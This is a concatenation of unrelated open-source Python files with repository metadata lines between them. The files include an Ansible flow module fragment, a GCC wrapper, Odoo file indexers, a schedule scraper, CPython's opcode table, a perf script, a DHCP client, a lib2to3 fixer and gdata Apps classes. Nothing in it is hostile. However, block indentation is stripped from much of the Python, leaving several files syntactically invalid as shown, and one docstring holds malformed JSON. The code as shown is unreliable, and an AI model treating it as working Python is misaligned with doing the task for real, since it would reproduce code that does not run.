err = ''
result = {}
result['name'] = flow.name
result['state'] = flow.state
result['temporary'] = flow.temporary
if flow.link:
result['link'] = flow.link
if flow.maxbw:
result['maxbw'] = flow.maxbw
if flow.priority:
result['priority'] = flow.priority
if flow.local_ip:
if flow.is_valid_address(flow.local_ip):
result['local_ip'] = flow.local_ip
else:
module.fail_json(msg='Invalid IP address: %s' % flow.local_ip,
rc=1)
if flow.remote_ip:
if flow.is_valid_address(flow.remote_ip):
result['remote_ip'] = flow.remote_ip
else:
module.fail_json(msg='Invalid IP address: %s' % flow.remote_ip,
rc=1)
if flow.transport:
result['transport'] = flow.transport
if flow.local_port:
if flow.is_valid_port(flow.local_port):
result['local_port'] = flow.local_port
else:
module.fail_json(msg='Invalid port: %s' % flow.local_port,
rc=1)
if flow.dsfield:
if flow.is_valid_dsfield(flow.dsfield):
result['dsfield'] = flow.dsfield
else:
module.fail_json(msg='Invalid dsfield: %s' % flow.dsfield,
rc=1)
if flow.state == 'absent':
if flow.flow_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = flow.delete_flow()
if rc != 0:
module.fail_json(msg='Error while deleting flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
elif flow.state == 'present':
if not flow.flow_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = flow.create_flow()
if rc != 0:
module.fail_json(msg='Error while creating flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
else:
if flow.flow_needs_updating():
(rc, out, err) = flow.update_flow()
if rc != 0:
module.fail_json(msg='Error while updating flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
elif flow.state == 'resetted':
if flow.flow_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = flow.reset_flow()
if rc != 0:
module.fail_json(msg='Error while resetting flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
if rc is None:
result['changed'] = False
else:
result['changed'] = True
if out:
result['stdout'] = out
if err:
result['stderr'] = err
module.exit_json(**result)
from ansible.module_utils.basic import *
main()
|
gpl-3.0
|
mlouhivu/build-recipes
|
gpaw/examples/sisu-1.3.0/gcc.py
|
3
|
2014
|
#!/usr/bin/env python
"""Wrapper for the GNU compiler that converts / removes incompatible
compiler options and allows for file-specific tailoring."""
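# Hypothetical usage sketch: the build system is pointed at this wrapper in
# place of the real compiler, so an invocation such as
#   python gcc.py -O2 -fPIC -c c/xc/tpss.c -o tpss.o
# gets its optimisation level and flags rewritten below before the actual
# compiler ('cc' on Sisu) is called.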
import sys
from subprocess import call
# Default compiler and options
compiler = 'gcc'
args2change = {}
fragile_files = ['c/xc/tpss.c']
# Default optimisation settings
default_level = 3
default_flags = ['-funroll-loops']
fragile_level = 2
fragile_flags = []
# Sisu (Cray XC40)
if True:
compiler = 'cc'
default_flags += ['-march=haswell -mtune=haswell -mavx2']
fragile_files += ['c/xc/revtpss.c']
# Taito (HP cluster)
if not True:
compiler = 'mpicc'
default_flags += ['-ffast-math -march=sandybridge -mtune=haswell']
optimise = None # optimisation level 0/1/2/3
debug = False # use -g or not
fragile = False # use special flags for current file?
sandwich = True # use optimisation flag twice (= no override possible)
# process arguments
args = []
for arg in sys.argv[1:]:
arg = arg.strip()
if arg.startswith('-O'):
level = int(arg.replace('-O',''))
if not optimise or level > optimise:
optimise = level
elif arg == '-g':
debug = True
elif arg in args2change:
if args2change[arg]:
args.append(args2change[arg])
else:
if arg in fragile_files:
fragile = True
args.append(arg)
# set default optimisation level and flags
if fragile:
# guard against optimise being None (no -O flag given) before comparing
optimise = fragile_level if optimise is None else min(fragile_level, optimise)
flags = fragile_flags
else:
optimise = default_level if optimise is None else max(default_level, optimise)
flags = default_flags
# add optimisation level to flags
if optimise is not None:
flags.insert(0, '-O{0}'.format(optimise))
if sandwich:
args.append('-O{0}'.format(optimise))
# make sure -g is always the _first_ flag, so it doesn't mess e.g. with the
# optimisation level
if debug:
flags.insert(0, '-g')
# construct and execute the compile command
cmd = '{0} {1} {2}'.format(compiler, ' '.join(flags), ' '.join(args))
print(cmd)
call(cmd, shell=True)
|
mit
|
valdecdev/odoo
|
addons/document/std_index.py
|
1
|
6502
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from content_index import indexer, cntIndex
from subprocess import Popen, PIPE
import StringIO
import odt2txt
import sys, zipfile, xml.dom.minidom
import logging
_logger = logging.getLogger(__name__)
def _to_unicode(s):
try:
return s.decode('utf-8')
except UnicodeError:
try:
return s.decode('latin')
except UnicodeError:
try:
return s.encode('ascii')
except UnicodeError:
return s
def textToString(element):
buffer = u""
for node in element.childNodes :
if node.nodeType == xml.dom.Node.TEXT_NODE :
buffer += node.nodeValue
elif node.nodeType == xml.dom.Node.ELEMENT_NODE :
buffer += textToString(node)
return buffer
class TxtIndex(indexer):
def _getMimeTypes(self):
return ['text/plain','text/html','text/diff','text/xml', 'text/*',
'application/xml']
def _getExtensions(self):
return ['.txt', '.py']
def _doIndexContent(self, content):
return content
cntIndex.register(TxtIndex())
class PptxIndex(indexer):
def _getMimeTypes(self):
return [ 'application/vnd.openxmlformats-officedocument.presentationml.presentation']
def _getExtensions(self):
return ['.pptx']
def _doIndexFile(self, fname):
def toString () :
""" Converts the document to a string. """
buffer = u""
for val in ["a:t"]:
for paragraph in content.getElementsByTagName(val) :
buffer += textToString(paragraph) + "\n"
return buffer
data = []
zip = zipfile.ZipFile(fname)
files = filter(lambda x: x.startswith('ppt/slides/slide'), zip.namelist())
for i in range(1, len(files) + 1):
content = xml.dom.minidom.parseString(zip.read('ppt/slides/slide%s.xml' % str(i)))
res = toString().encode('ascii','replace')
data.append(res)
return _to_unicode('\n'.join(data))
cntIndex.register(PptxIndex())
class DocIndex(indexer):
def _getMimeTypes(self):
return [ 'application/ms-word']
def _getExtensions(self):
return ['.doc']
def _doIndexFile(self, fname):
try:
pop = Popen(['antiword', fname], shell=False, stdout=PIPE)
(data, _) = pop.communicate()
return _to_unicode(data)
except OSError:
_logger.warning("Failed attempt to execute antiword (MS Word reader). Antiword is necessary to index the file %s of MIME type %s. Detailed error available at DEBUG level.", fname, self._getMimeTypes()[0])
_logger.debug("Trace of the failed file indexing attempt.", exc_info=True)
return u''
cntIndex.register(DocIndex())
class DocxIndex(indexer):
def _getMimeTypes(self):
return [ 'application/vnd.openxmlformats-officedocument.wordprocessingml.document']
def _getExtensions(self):
return ['.docx']
def _doIndexFile(self, fname):
zip = zipfile.ZipFile(fname)
content = xml.dom.minidom.parseString(zip.read("word/document.xml"))
def toString () :
""" Converts the document to a string. """
buffer = u""
for val in ["w:p", "w:h", "text:list"]:
for paragraph in content.getElementsByTagName(val) :
buffer += textToString(paragraph) + "\n"
return buffer
res = toString().encode('ascii','replace')
return _to_unicode(res)
cntIndex.register(DocxIndex())
class XlsxIndex(indexer):
def _getMimeTypes(self):
return [ 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet']
def _getExtensions(self):
return ['.xlsx']
def _doIndexFile(self, fname):
zip = zipfile.ZipFile(fname)
content = xml.dom.minidom.parseString(zip.read("xl/sharedStrings.xml"))
def toString () :
""" Converts the document to a string. """
buffer = u""
for val in ["t"]:
for paragraph in content.getElementsByTagName(val) :
buffer += textToString(paragraph) + "\n"
return buffer
res = toString().encode('ascii','replace')
return _to_unicode(res)
cntIndex.register(XlsxIndex())
class PdfIndex(indexer):
def _getMimeTypes(self):
return [ 'application/pdf']
def _getExtensions(self):
return ['.pdf']
def _doIndexFile(self, fname):
try:
pop = Popen(['pdftotext', '-enc', 'UTF-8', '-nopgbrk', fname, '-'], shell=False, stdout=PIPE)
(data, _) = pop.communicate()
return _to_unicode(data)
except OSError:
_logger.warning("Failed attempt to execute pdftotext. This program is necessary to index the file %s of MIME type %s. Detailed error available at DEBUG level.", fname, self._getMimeTypes()[0])
_logger.debug("Trace of the failed file indexing attempt.", exc_info=True)
return u''
cntIndex.register(PdfIndex())
class ImageNoIndex(indexer):
def _getMimeTypes(self):
return [ 'image/*']
def _getExtensions(self):
#better return no extension, and let 'file' do its magic
return []
#return ['.png','.jpg','.gif','.jpeg','.bmp','.tiff']
def _doIndexContent(self, content):
return 'image'
cntIndex.register(ImageNoIndex())
# other opendocument formats:
# chart-template chart database
# formula-template formula graphics-template graphics
# image
# presentation-template presentation spreadsheet-template spreadsheet
class OpenDoc(indexer):
""" Index OpenDocument files.
Q: is it really worth it to index spreadsheets, or do we only get a
meaningless list of numbers (cell contents) ?
"""
def _getMimeTypes(self):
otypes = [ 'text', 'text-web', 'text-template', 'text-master' ]
return map(lambda a: 'application/vnd.oasis.opendocument.'+a, otypes)
def _getExtensions(self):
return ['.odt', '.ott', ] # '.ods'
def _doIndexContent(self, content):
s = StringIO.StringIO(content)
o = odt2txt.OpenDocumentTextFile(s)
result = _to_unicode(o.toString())
s.close()
return result
cntIndex.register(OpenDoc())
#eof
|
agpl-3.0
|
Ferluci/MAI-Schedule
|
parser.py
|
1
|
1373
|
from requests import get
from bs4 import BeautifulSoup
def _group_parser(target_url):
request = get(target_url)
soup = BeautifulSoup(request.text, "html.parser")
groups = []
for group in soup.find_all('a', class_="sc-group-item"):
group = group.get_text()
groups.append(group)
return groups
def parse_groups():
target_url = 'https://www.mai.ru/education/schedule'
return _group_parser(target_url)
def parse_examining_groups():
target_url = 'https://www.mai.ru/education/schedule/session'
return _group_parser(target_url)
def _schedule_parser(target_url):
request = get(target_url)
soup = BeautifulSoup(request.text, "html.parser")
result = []
for day in soup.find_all('div', class_="sc-container"):
day = day.get_text().split('\n')
day = [x for x in day if x != '']
result.append(day)
return result
def parse_academic_schedule(group_name, week_number):
target_url = "http://www.mai.ru/" + \
"education/schedule/detail.php?group=" + \
group_name + '&week=' + str(week_number)
return _schedule_parser(target_url)
def parse_session_schedule(group_name):
target_url = "https://www.mai.ru/" + \
"education/schedule/session.php?group=" + \
group_name
return _schedule_parser(target_url)
|
mit
|
40223148/2015cda_g5
|
static/Brython3.1.1-20150328-091302/Lib/opcode.py
|
714
|
5442
|
"""
opcode module - potentially shared between dis and other modules which
operate on bytecodes (e.g. peephole optimizers).
"""
__all__ = ["cmp_op", "hasconst", "hasname", "hasjrel", "hasjabs",
"haslocal", "hascompare", "hasfree", "opname", "opmap",
"HAVE_ARGUMENT", "EXTENDED_ARG", "hasnargs"]
# It's a chicken-and-egg I'm afraid:
# We're imported before _opcode's made.
# With exception unheeded
# (stack_effect is not needed)
# Both our chickens and eggs are allayed.
# --Larry Hastings, 2013/11/23
try:
from _opcode import stack_effect
__all__.append('stack_effect')
except ImportError:
pass
cmp_op = ('<', '<=', '==', '!=', '>', '>=', 'in', 'not in', 'is',
'is not', 'exception match', 'BAD')
hasconst = []
hasname = []
hasjrel = []
hasjabs = []
haslocal = []
hascompare = []
hasfree = []
hasnargs = []
opmap = {}
opname = [''] * 256
for op in range(256): opname[op] = '<%r>' % (op,)
del op
def def_op(name, op):
opname[op] = name
opmap[name] = op
def name_op(name, op):
def_op(name, op)
hasname.append(op)
def jrel_op(name, op):
def_op(name, op)
hasjrel.append(op)
def jabs_op(name, op):
def_op(name, op)
hasjabs.append(op)
# Instruction opcodes for compiled code
# Blank lines correspond to available opcodes
def_op('POP_TOP', 1)
def_op('ROT_TWO', 2)
def_op('ROT_THREE', 3)
def_op('DUP_TOP', 4)
def_op('DUP_TOP_TWO', 5)
def_op('NOP', 9)
def_op('UNARY_POSITIVE', 10)
def_op('UNARY_NEGATIVE', 11)
def_op('UNARY_NOT', 12)
def_op('UNARY_INVERT', 15)
def_op('BINARY_POWER', 19)
def_op('BINARY_MULTIPLY', 20)
def_op('BINARY_MODULO', 22)
def_op('BINARY_ADD', 23)
def_op('BINARY_SUBTRACT', 24)
def_op('BINARY_SUBSCR', 25)
def_op('BINARY_FLOOR_DIVIDE', 26)
def_op('BINARY_TRUE_DIVIDE', 27)
def_op('INPLACE_FLOOR_DIVIDE', 28)
def_op('INPLACE_TRUE_DIVIDE', 29)
def_op('STORE_MAP', 54)
def_op('INPLACE_ADD', 55)
def_op('INPLACE_SUBTRACT', 56)
def_op('INPLACE_MULTIPLY', 57)
def_op('INPLACE_MODULO', 59)
def_op('STORE_SUBSCR', 60)
def_op('DELETE_SUBSCR', 61)
def_op('BINARY_LSHIFT', 62)
def_op('BINARY_RSHIFT', 63)
def_op('BINARY_AND', 64)
def_op('BINARY_XOR', 65)
def_op('BINARY_OR', 66)
def_op('INPLACE_POWER', 67)
def_op('GET_ITER', 68)
def_op('PRINT_EXPR', 70)
def_op('LOAD_BUILD_CLASS', 71)
def_op('YIELD_FROM', 72)
def_op('INPLACE_LSHIFT', 75)
def_op('INPLACE_RSHIFT', 76)
def_op('INPLACE_AND', 77)
def_op('INPLACE_XOR', 78)
def_op('INPLACE_OR', 79)
def_op('BREAK_LOOP', 80)
def_op('WITH_CLEANUP', 81)
def_op('RETURN_VALUE', 83)
def_op('IMPORT_STAR', 84)
def_op('YIELD_VALUE', 86)
def_op('POP_BLOCK', 87)
def_op('END_FINALLY', 88)
def_op('POP_EXCEPT', 89)
HAVE_ARGUMENT = 90 # Opcodes from here have an argument:
name_op('STORE_NAME', 90) # Index in name list
name_op('DELETE_NAME', 91) # ""
def_op('UNPACK_SEQUENCE', 92) # Number of tuple items
jrel_op('FOR_ITER', 93)
def_op('UNPACK_EX', 94)
name_op('STORE_ATTR', 95) # Index in name list
name_op('DELETE_ATTR', 96) # ""
name_op('STORE_GLOBAL', 97) # ""
name_op('DELETE_GLOBAL', 98) # ""
def_op('LOAD_CONST', 100) # Index in const list
hasconst.append(100)
name_op('LOAD_NAME', 101) # Index in name list
def_op('BUILD_TUPLE', 102) # Number of tuple items
def_op('BUILD_LIST', 103) # Number of list items
def_op('BUILD_SET', 104) # Number of set items
def_op('BUILD_MAP', 105) # Number of dict entries (up to 255)
name_op('LOAD_ATTR', 106) # Index in name list
def_op('COMPARE_OP', 107) # Comparison operator
hascompare.append(107)
name_op('IMPORT_NAME', 108) # Index in name list
name_op('IMPORT_FROM', 109) # Index in name list
jrel_op('JUMP_FORWARD', 110) # Number of bytes to skip
jabs_op('JUMP_IF_FALSE_OR_POP', 111) # Target byte offset from beginning of code
jabs_op('JUMP_IF_TRUE_OR_POP', 112) # ""
jabs_op('JUMP_ABSOLUTE', 113) # ""
jabs_op('POP_JUMP_IF_FALSE', 114) # ""
jabs_op('POP_JUMP_IF_TRUE', 115) # ""
name_op('LOAD_GLOBAL', 116) # Index in name list
jabs_op('CONTINUE_LOOP', 119) # Target address
jrel_op('SETUP_LOOP', 120) # Distance to target address
jrel_op('SETUP_EXCEPT', 121) # ""
jrel_op('SETUP_FINALLY', 122) # ""
def_op('LOAD_FAST', 124) # Local variable number
haslocal.append(124)
def_op('STORE_FAST', 125) # Local variable number
haslocal.append(125)
def_op('DELETE_FAST', 126) # Local variable number
haslocal.append(126)
def_op('RAISE_VARARGS', 130) # Number of raise arguments (1, 2, or 3)
def_op('CALL_FUNCTION', 131) # #args + (#kwargs << 8)
hasnargs.append(131)
def_op('MAKE_FUNCTION', 132) # Number of args with default values
def_op('BUILD_SLICE', 133) # Number of items
def_op('MAKE_CLOSURE', 134)
def_op('LOAD_CLOSURE', 135)
hasfree.append(135)
def_op('LOAD_DEREF', 136)
hasfree.append(136)
def_op('STORE_DEREF', 137)
hasfree.append(137)
def_op('DELETE_DEREF', 138)
hasfree.append(138)
def_op('CALL_FUNCTION_VAR', 140) # #args + (#kwargs << 8)
hasnargs.append(140)
def_op('CALL_FUNCTION_KW', 141) # #args + (#kwargs << 8)
hasnargs.append(141)
def_op('CALL_FUNCTION_VAR_KW', 142) # #args + (#kwargs << 8)
hasnargs.append(142)
jrel_op('SETUP_WITH', 143)
def_op('LIST_APPEND', 145)
def_op('SET_ADD', 146)
def_op('MAP_ADD', 147)
def_op('LOAD_CLASSDEREF', 148)
hasfree.append(148)
def_op('EXTENDED_ARG', 144)
EXTENDED_ARG = 144
del def_op, name_op, jrel_op, jabs_op
|
gpl-3.0
|
TheNotOnly/linux-3.5
|
tools/perf/scripts/python/check-perf-trace.py
|
11214
|
2503
|
# perf script event handlers, generated by perf script -g python
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# This script tests basic functionality such as flag and symbol
# strings, common_xxx() calls back into perf, begin, end, unhandled
# events, etc. Basically, if this script runs successfully and
# displays expected results, Python scripting support should be ok.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Core import *
from perf_trace_context import *
unhandled = autodict()
def trace_begin():
print "trace_begin"
pass
def trace_end():
print_unhandled()
def irq__softirq_entry(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
vec):
print_header(event_name, common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
print_uncommon(context)
print "vec=%s\n" % \
(symbol_str("irq__softirq_entry", "vec", vec)),
def kmem__kmalloc(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
call_site, ptr, bytes_req, bytes_alloc,
gfp_flags):
print_header(event_name, common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
print_uncommon(context)
print "call_site=%u, ptr=%u, bytes_req=%u, " \
"bytes_alloc=%u, gfp_flags=%s\n" % \
(call_site, ptr, bytes_req, bytes_alloc,
flag_str("kmem__kmalloc", "gfp_flags", gfp_flags)),
def trace_unhandled(event_name, context, event_fields_dict):
try:
unhandled[event_name] += 1
except TypeError:
unhandled[event_name] = 1
def print_header(event_name, cpu, secs, nsecs, pid, comm):
print "%-20s %5u %05u.%09u %8u %-20s " % \
(event_name, cpu, secs, nsecs, pid, comm),
# print trace fields not included in handler args
def print_uncommon(context):
print "common_preempt_count=%d, common_flags=%s, common_lock_depth=%d, " \
% (common_pc(context), trace_flag_str(common_flags(context)), \
common_lock_depth(context))
def print_unhandled():
keys = unhandled.keys()
if not keys:
return
print "\nunhandled events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for event_name in keys:
print "%-40s %10d\n" % (event_name, unhandled[event_name])
|
gpl-2.0
|
frankurcrazy/pydhcpd
|
dhcp_client.py
|
1
|
2797
|
#!/usr/bin/env python
import dhcp_packet
import socket
import random
import time
import Queue
import select
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.bind( ("", 68) )
sock.settimeout(5)
mac = "".join(random.choice("abcdef0123456789") for _ in xrange(0,12))
dest = ("<broadcast>", 67)
bufsize = 8192
while True:
xid = random.randrange(2**32)
t1 = 0
# send dhcp_discover
print "sending dhcp discover"
dhcp_discover = dhcp_packet.dhcp_packet(message_type=dhcp_packet.DHCPDISCOVER,mac=mac,xid=xid,broadcast=True)
print dhcp_discover
sock.sendto(dhcp_discover.to_raw(),dest)
# receive dhcp offer
try:
response = sock.recv(bufsize)
except socket.timeout:
print "timeout"
continue
response = dhcp_packet.from_raw_message(response)
print response
if response.xid == xid and response.message_type == dhcp_packet.DHCPOFFER:
print "received correspondent dhcp offer"
print response
offer_ip = response.yiaddr
server_identifier = [ value for (code, value) in response.options if code == dhcp_packet.__OPTION_SERVER_IDENTIFIER__ ]
server_identifier = server_identifier[0] if server_identifier else None
lease_time = [ value for (code, value) in response.options if code == dhcp_packet.__OPTION_LEASE_TIME__ ]
t1_time = [ value for (code, value) in response.options if code == dhcp_packet.__OPTION_RENEW_TIME__ ]
t1 = t1_time[0] if t1_time else lease_time[0]/2 if lease_time else 0
# send dhcp request
print "sending dhcp request"
options = [
(dhcp_packet.__OPTION_SERVER_IDENTIFIER__, server_identifier),
(dhcp_packet.__OPTION_REQUESTED_ADDRESS__, offer_ip)
]
dhcp_request = dhcp_packet.dhcp_packet(message_type=dhcp_packet.DHCPREQUEST, mac=mac, xid=xid, broadcast=True, options=options)
print dhcp_request
sock.sendto(dhcp_request.to_raw(),dest)
# recv dhcp ack
try:
response = sock.recv(bufsize)
except socket.timeout:
print "timeout"
continue
response = dhcp_packet.from_raw_message(response)
if response.xid == xid and response.message_type == dhcp_packet.DHCPACK:
print response
while True:
if t1 ==0: continue
# send renew
time.sleep(t1)
print "lease time/2 or t1 reached, send renew (%(timestamp)s)" % { 'timestamp': time.ctime()}
dhcp_request = dhcp_packet.dhcp_packet(message_type=dhcp_packet.DHCPREQUEST, mac=mac, xid=xid, broadcast=True, options=options)
print dhcp_request
sock.sendto(dhcp_request.to_raw(),dest)
# recv ack
try:
response = sock.recv(bufsize)
except socket.timeout:
print "timeout"
continue
response = dhcp_packet.from_raw_message(response)
if response.xid == xid and response.message_type == dhcp_packet.DHCPACK:
print response
|
bsd-2-clause
|
akhileshmaurya/Starting-With-Python
|
DistanceUtils.py
|
1
|
1659
|
import math
import json
def manhattanDistance(x1, y1, x2, y2):
distance = abs(x1 - x2) + abs(y1 - y2)
return distance
def euclidianDistance(x1, y1, x2, y2):
distance = math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)
return distance
data = []
with open('data.txt') as json_data:
data = json.load(json_data)
#print(data)
for key in data:
print key
print data[key]
'''Let's assume we have some ratings keyed by user; we have to
read this and parse the JSON --
{"Angelica": {"Blues Traveler": 3.5, "Broken Bells": 2.0,
"Norah Jones": 4.5, "Phoenix": 5.0,
"Slightly Stoopid": 1.5,
"The Strokes": 2.5, "Vampire Weekend": 2.0},
{"Blues Traveler": 2.0, "Broken Bells": 3.5,
"Deadmau5": 4.0, "Phoenix": 2.0,
"Slightly Stoopid": 3.5, "Vampire Weekend": 3.0},
{"Blues Traveler": 5.0, "Broken Bells": 1.0,
"Deadmau5": 1.0, "Norah Jones": 3.0,
"Phoenix": 5, "Slightly Stoopid": 1.0},
{"Blues Traveler": 3.0, "Broken Bells": 4.0,
"Deadmau5": 4.5, "Phoenix": 3.0,
"Slightly Stoopid": 4.5, "The Strokes": 4.0,
"Vampire Weekend": 2.0},
{"Broken Bells": 4.0, "Deadmau5": 1.0,
"Norah Jones": 4.0, "The Strokes": 4.0,
"Vampire Weekend": 1.0},
{"Broken Bells": 4.5, "Deadmau5": 4.0, "Norah Jones": 5.0,
"Phoenix": 5.0, "Slightly Stoopid": 4.5,
"The Strokes": 4.0, "Vampire Weekend": 4.0},
{"Blues Traveler": 5.0, "Broken Bells": 2.0,
"Norah Jones": 3.0, "Phoenix": 5.0,
"Slightly Stoopid": 4.0, "The Strokes": 5.0},
"Veronica": {"Blues Traveler": 3.0, "Norah Jones": 5.0,
"Phoenix": 4.0, "Slightly Stoopid": 2.5,
"The Strokes": 3.0}}'''
|
gpl-3.0
|
MichaelNedzelsky/intellij-community
|
python/helpers/pydev/third_party/pep8/lib2to3/lib2to3/fixes/fix_renames.py
|
326
|
2218
|
"""Fix incompatible renames
Fixes:
* sys.maxint -> sys.maxsize
"""
# Author: Christian Heimes
# based on Collin Winter's fix_import
# Local imports
from .. import fixer_base
from ..fixer_util import Name, attr_chain
MAPPING = {"sys": {"maxint" : "maxsize"},
}
LOOKUP = {}
def alternates(members):
return "(" + "|".join(map(repr, members)) + ")"
def build_pattern():
#bare = set()
for module, replace in MAPPING.items():
for old_attr, new_attr in replace.items():
LOOKUP[(module, old_attr)] = new_attr
#bare.add(module)
#bare.add(old_attr)
#yield """
# import_name< 'import' (module=%r
# | dotted_as_names< any* module=%r any* >) >
# """ % (module, module)
yield """
import_from< 'from' module_name=%r 'import'
( attr_name=%r | import_as_name< attr_name=%r 'as' any >) >
""" % (module, old_attr, old_attr)
yield """
power< module_name=%r trailer< '.' attr_name=%r > any* >
""" % (module, old_attr)
#yield """bare_name=%s""" % alternates(bare)
class FixRenames(fixer_base.BaseFix):
BM_compatible = True
PATTERN = "|".join(build_pattern())
order = "pre" # Pre-order tree traversal
# Don't match the node if it's within another match
def match(self, node):
match = super(FixRenames, self).match
results = match(node)
if results:
if any(match(obj) for obj in attr_chain(node, "parent")):
return False
return results
return False
#def start_tree(self, tree, filename):
# super(FixRenames, self).start_tree(tree, filename)
# self.replace = {}
def transform(self, node, results):
mod_name = results.get("module_name")
attr_name = results.get("attr_name")
#bare_name = results.get("bare_name")
#import_mod = results.get("module")
if mod_name and attr_name:
new_attr = unicode(LOOKUP[(mod_name.value, attr_name.value)])
attr_name.replace(Name(new_attr, prefix=attr_name.prefix))
|
apache-2.0
|
pyjs/pyjs
|
examples/tabpanelwidget/__main__.py
|
8
|
1051
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
TARGETS = [
'Tabs.py',
]
PACKAGE = {
'title': 'tabpanelwidget',
'desc': 'Tab Panel example',
}
def setup(targets):
'''Setup example for translation, MUST call util.setup(targets).'''
util.setup(targets)
def translate():
'''Translate example, MUST call util.translate().'''
util.translate()
def install(package):
'''Install and cleanup example module. MUST call util.install(package)'''
util.install(package)
##---------------------------------------##
# --------- (-: DO NOT EDIT :-) --------- #
##---------------------------------------##
import sys
import os
examples = head = os.path.abspath(os.path.dirname(__file__))
while os.path.split(examples)[1].lower() != 'examples':
examples = os.path.split(examples)[0]
if not examples:
raise ValueError("Cannot determine examples directory")
sys.path.insert(0, os.path.join(examples))
from _examples import util
sys.path.pop(0)
util.init(head)
setup(TARGETS)
translate()
install(PACKAGE)
|
apache-2.0
|
Immortalin/python-for-android
|
python3-alpha/extra_modules/gdata/apps/__init__.py
|
285
|
21144
|
#!/usr/bin/python
#
# Copyright (C) 2007 SIOS Technology, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains objects used with Google Apps."""
__author__ = '[email protected] (Takashi MATSUO)'
import atom
import gdata
# XML namespaces which are often used in Google Apps entities.
APPS_NAMESPACE = 'http://schemas.google.com/apps/2006'
APPS_TEMPLATE = '{http://schemas.google.com/apps/2006}%s'
class EmailList(atom.AtomBase):
"""The Google Apps EmailList element"""
_tag = 'emailList'
_namespace = APPS_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['name'] = 'name'
def __init__(self, name=None, extension_elements=None,
extension_attributes=None, text=None):
self.name = name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def EmailListFromString(xml_string):
return atom.CreateClassFromXMLString(EmailList, xml_string)
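# Illustrative sketch (the XML below is hypothetical, not from this module):
#
#     xml = ('<apps:emailList '
#            'xmlns:apps="http://schemas.google.com/apps/2006" name="sales"/>')
#     email_list = EmailListFromString(xml)
#     # email_list.name == 'sales'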
class Who(atom.AtomBase):
"""The Google Apps Who element"""
_tag = 'who'
_namespace = gdata.GDATA_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['rel'] = 'rel'
_attributes['email'] = 'email'
def __init__(self, rel=None, email=None, extension_elements=None,
extension_attributes=None, text=None):
self.rel = rel
self.email = email
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def WhoFromString(xml_string):
return atom.CreateClassFromXMLString(Who, xml_string)
class Login(atom.AtomBase):
"""The Google Apps Login element"""
_tag = 'login'
_namespace = APPS_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['userName'] = 'user_name'
_attributes['password'] = 'password'
_attributes['suspended'] = 'suspended'
_attributes['admin'] = 'admin'
_attributes['changePasswordAtNextLogin'] = 'change_password'
_attributes['agreedToTerms'] = 'agreed_to_terms'
_attributes['ipWhitelisted'] = 'ip_whitelisted'
_attributes['hashFunctionName'] = 'hash_function_name'
def __init__(self, user_name=None, password=None, suspended=None,
ip_whitelisted=None, hash_function_name=None,
admin=None, change_password=None, agreed_to_terms=None,
extension_elements=None, extension_attributes=None,
text=None):
self.user_name = user_name
self.password = password
self.suspended = suspended
self.admin = admin
self.change_password = change_password
self.agreed_to_terms = agreed_to_terms
self.ip_whitelisted = ip_whitelisted
self.hash_function_name = hash_function_name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def LoginFromString(xml_string):
return atom.CreateClassFromXMLString(Login, xml_string)
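# Usage sketch (values are hypothetical): a Login element is normally built
# from keyword arguments and serialized as part of a user entry, e.g.
#
#     login = Login(user_name='jdoe', password='secret', suspended='false')
#     # login.ToString() would yield an <apps:login userName="jdoe" ...> element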
class Quota(atom.AtomBase):
"""The Google Apps Quota element"""
_tag = 'quota'
_namespace = APPS_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['limit'] = 'limit'
def __init__(self, limit=None, extension_elements=None,
extension_attributes=None, text=None):
self.limit = limit
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def QuotaFromString(xml_string):
return atom.CreateClassFromXMLString(Quota, xml_string)
class Name(atom.AtomBase):
"""The Google Apps Name element"""
_tag = 'name'
_namespace = APPS_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['familyName'] = 'family_name'
_attributes['givenName'] = 'given_name'
def __init__(self, family_name=None, given_name=None,
extension_elements=None, extension_attributes=None, text=None):
self.family_name = family_name
self.given_name = given_name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def NameFromString(xml_string):
return atom.CreateClassFromXMLString(Name, xml_string)
